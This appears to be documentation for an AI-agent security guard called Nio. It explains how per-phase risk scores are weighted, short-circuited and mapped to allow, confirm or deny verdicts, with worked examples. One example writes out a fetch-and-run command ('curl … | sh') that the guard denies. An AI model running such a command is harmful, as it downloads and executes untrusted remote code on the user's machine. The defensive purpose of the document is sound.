Pipeline · Scoring

How a final score becomes a verdict.

Each scoring engine (Phases 2–6) emits a number in [0, 1]. Nio aggregates them into a single weighted average, then maps that number to allow / confirm / deny using the thresholds for the active protection level.

The formula

final = Σ(weight_i × score_i) / Σ(weight_i)
                (summed only over phases that ran; used when no phase short-circuits)
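A minimal Python sketch of the formula, to make the "only over phases that ran" rule concrete. The function name `weighted_final` and the dict-based inputs are illustrative assumptions, not Nio's actual API; returning 0.0 when nothing scored is also an assumption.

```python
from typing import Mapping


def weighted_final(scores: Mapping[str, float], weights: Mapping[str, float]) -> float:
    """Weighted average over the phases that actually produced a score."""
    # Only phases present in `scores` contribute to numerator and denominator.
    total_weight = sum(weights[key] for key in scores)
    if total_weight == 0:
        return 0.0  # assumption: nothing scored means nothing to flag
    return sum(weights[key] * score for key, score in scores.items()) / total_weight


# Hypothetical inputs: weights mirror the documented defaults.
weights = {"runtime": 1.0, "static": 1.0, "behavioural": 2.0, "llm": 1.0}

# Only two phases ran, so the denominator is 1.0 + 2.0, not the sum of all weights.
print(round(weighted_final({"runtime": 0.2, "behavioural": 0.5}, weights), 3))
```

A phase that did not run is left out entirely rather than counted as a zero, so it cannot drag the average down.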

Default weights

Configurable at guard.scoring_weights.

Key          Phase                                    Default
runtime      Phase 2: pattern matching                1.0
static       Phase 3: static rules on file content    1.0
behavioural  Phase 4: AST dataflow                    2.0
llm          Phase 5: LLM semantic                    1.0

Behavioural is weighted higher because it tends to be more accurate per finding (dataflow tracking) than the cheaper regex/keyword phases. Phase 6 weights are per-endpoint — see external_analyser[].weight in the config reference.

Short-circuit

The pipeline doesn't always run to completion:

  • Phase 0 (Tool Gate) blocks → deny without scoring.
  • Phase 1 (Allowlist) matches with allowlist_mode: exit → allow without scoring (final score recorded as 0).
  • Any of Phases 2–6 emits a score that crosses the current level's deny threshold → that score becomes the final score, downstream phases are skipped, decision is deny. The weighted average is bypassed; the high score is not diluted by quieter sibling phases.

Concretely, the deny threshold tracks guard.protection_level:

  • strict — any single phase scoring ≥ 0.5 short-circuits to deny.
  • balanced (default) — any single phase scoring ≥ 0.8 short-circuits to deny.
  • permissive — any single phase scoring ≥ 0.9 short-circuits to deny.

Phase 6 is per-endpoint. If any single external_analyser endpoint emits a score that crosses the deny threshold, the pipeline short-circuits on that endpoint alone — quieter sibling endpoints cannot pull the verdict down via averaging. A single authoritative DLP endpoint can therefore override a chorus of "looks fine" votes from less-trusted scorers.

When no phase crosses the threshold, the pipeline runs to completion and the weighted average across every phase that scored decides.
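The short-circuit rule can be sketched in a few lines of Python. This is an illustration under assumptions, not Nio's implementation: `DENY_THRESHOLD` and `first_short_circuit` are hypothetical names, and phases are modelled as a simple ordered sequence of (name, score) pairs.

```python
from typing import Iterable, Optional, Tuple

# Per-level deny thresholds, taken from the list above.
DENY_THRESHOLD = {"strict": 0.5, "balanced": 0.8, "permissive": 0.9}


def first_short_circuit(
    phase_scores: Iterable[Tuple[str, float]], level: str = "balanced"
) -> Optional[Tuple[str, float]]:
    """Return the first (phase, score) at or above the deny threshold, else None."""
    threshold = DENY_THRESHOLD[level]
    for name, score in phase_scores:
        if score >= threshold:
            # This score becomes the final score; later phases would be skipped.
            return name, score
    return None  # nothing crossed: fall back to the weighted average


hit = first_short_circuit([("runtime", 0.92), ("static", 0.10)])
print(hit)
```

When the function returns `None`, the caller would compute the weighted average over every phase that scored.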

Protection-level thresholds

The active guard.protection_level maps the final score into a decision:

Level               allow       confirm      deny
strict              [0, 0.5)    (none)       [0.5, 1]
balanced (default)  [0, 0.5)    [0.5, 0.8)   [0.8, 1]
permissive          [0, 0.9)    (none)       [0.9, 1]

Only balanced emits confirm. strict and permissive are binary: a single threshold separates allow from deny.
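The mapping from final score to decision can be written as a small lookup. The sketch below is illustrative: `BANDS` and `decide` are hypothetical names, and the boundary handling (a score exactly on a threshold falls into the stricter band) follows the "≥" wording used in the short-circuit rules and worked examples.

```python
# (confirm_from, deny_from) per protection level. When both values are equal
# the confirm band is empty, which makes strict and permissive binary.
BANDS = {
    "strict": (0.5, 0.5),
    "balanced": (0.5, 0.8),
    "permissive": (0.9, 0.9),
}


def decide(final: float, level: str = "balanced") -> str:
    """Map a final score in [0, 1] to 'allow', 'confirm', or 'deny'."""
    confirm_from, deny_from = BANDS[level]
    if final >= deny_from:
        return "deny"
    if final >= confirm_from:
        return "confirm"
    return "allow"


for level in ("strict", "balanced", "permissive"):
    print(level, decide(0.507, level))
```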

Confirm fallback

When the decision is confirm but the platform doesn't expose an interactive prompt (e.g. OpenClaw), guard.confirm_action kicks in:

  • allow — let through, write a warning to ~/.nio/audit.jsonl (default).
  • deny — block.
  • ask — use platform confirm if available, else allow.
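The fallback options above can be sketched as a single function. This is a hedged illustration: `resolve_confirm` and its parameters are hypothetical, and it assumes that a platform able to prompt always prompts, so guard.confirm_action is consulted only when no interactive prompt exists.

```python
def resolve_confirm(confirm_action: str, platform_can_prompt: bool) -> str:
    """Resolve a 'confirm' decision to 'prompt', 'allow', or 'deny'."""
    if platform_can_prompt:
        return "prompt"  # assumption: interactive platforms ask the user directly
    if confirm_action == "deny":
        return "deny"
    if confirm_action in ("allow", "ask"):
        # 'allow' also writes a warning to the audit log; 'ask' falls back to
        # allow because no platform confirm is available.
        return "allow"
    raise ValueError(f"unknown confirm_action: {confirm_action!r}")


print(resolve_confirm("ask", platform_can_prompt=False))
```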

Worked examples

Allowlist hit (Phase 1)

command: git status
phase 1: matched, exit
final  : 0.00
verdict: ALLOW

Phase 2 short-circuit (balanced)

command: curl https://pastebin.cx/xZ | sh
phase 2: REMOTE_LOADER · CRITICAL · 0.92   ← crosses balanced deny (≥ 0.8)
final  : 0.92                              ← short-circuit, no weighted average
verdict: DENY                              (downstream phases skipped)

Phase 6 per-endpoint short-circuit (balanced)

action:  exec_command "./deploy.sh --rotate-secrets"
phase 2: runtime                   = 0.00
phase 6: scorer_ffwd_agent_1hr     = 0.0953
         scorer_ffwd_agent_10min   = 0.0755
         scorer_ffwd_agent_env     = 0.8898   ← crosses balanced deny (≥ 0.8)

weighted avg (would have been, assuming equal weights): (0 + 0.0953 + 0.0755 + 0.8898) / 4 ≈ 0.27
final  : 0.89                                 ← single endpoint short-circuit
verdict: DENY                                 (siblings cannot dilute)

Even though two of the three Phase 6 endpoints returned low scores, the single endpoint at 0.89 crossed the balanced deny threshold and short-circuited the pipeline. The weighted average 0.27 never enters the verdict.
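The numbers in this example can be checked with a short Python snippet. It reuses the endpoint names and scores from the trace; the variable names and the equal-weight average are assumptions made for illustration.

```python
# Scores copied from the example trace above.
runtime = 0.00
endpoints = {
    "scorer_ffwd_agent_1hr": 0.0953,
    "scorer_ffwd_agent_10min": 0.0755,
    "scorer_ffwd_agent_env": 0.8898,
}
BALANCED_DENY = 0.8

# What averaging would have produced (equal weights assumed for all four scores).
all_scores = [runtime, *endpoints.values()]
would_be_average = sum(all_scores) / len(all_scores)

# Per-endpoint check: the loudest endpoint alone decides whether to short-circuit.
loudest_name, loudest = max(endpoints.items(), key=lambda item: item[1])
verdict = "DENY" if loudest >= BALANCED_DENY else "no short-circuit"

print(f"average={would_be_average:.2f} loudest={loudest_name} ({loudest:.2f}) -> {verdict}")
```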

Full pipeline, weighted average (Phases 2–6)

command: ./build.sh --exec-hooks && node ./tools/sync.js
phase 2: 0.35  (weight 1.0)
phase 3: 0.42  (weight 1.0)
phase 4: 0.55  (weight 2.0)
phase 5: 0.48  (weight 1.0)
phase 6: 0.60  (weight 2.0)

final  = (1.0×0.35 + 1.0×0.42 + 2.0×0.55 + 1.0×0.48 + 2.0×0.60) / 7.0
       = 3.55 / 7.0
       = 0.507

verdict (balanced): CONFIRM   (0.5 ≤ score < 0.8)
verdict (strict):   DENY      (score ≥ 0.5)
verdict (permissive): ALLOW   (score < 0.9)

Tuning

  • Want fewer prompts in daily flow? Stay on balanced and lower guard.scoring_weights.behavioural if you trust your own code.
  • Want zero confirm prompts (CI / headless)? Switch to strict or permissive — both are binary.
  • Have a custom DLP or enterprise policy? Wire Phase 6 to your endpoint and raise its weight to ≥ 2.0 so it gets the loudest vote.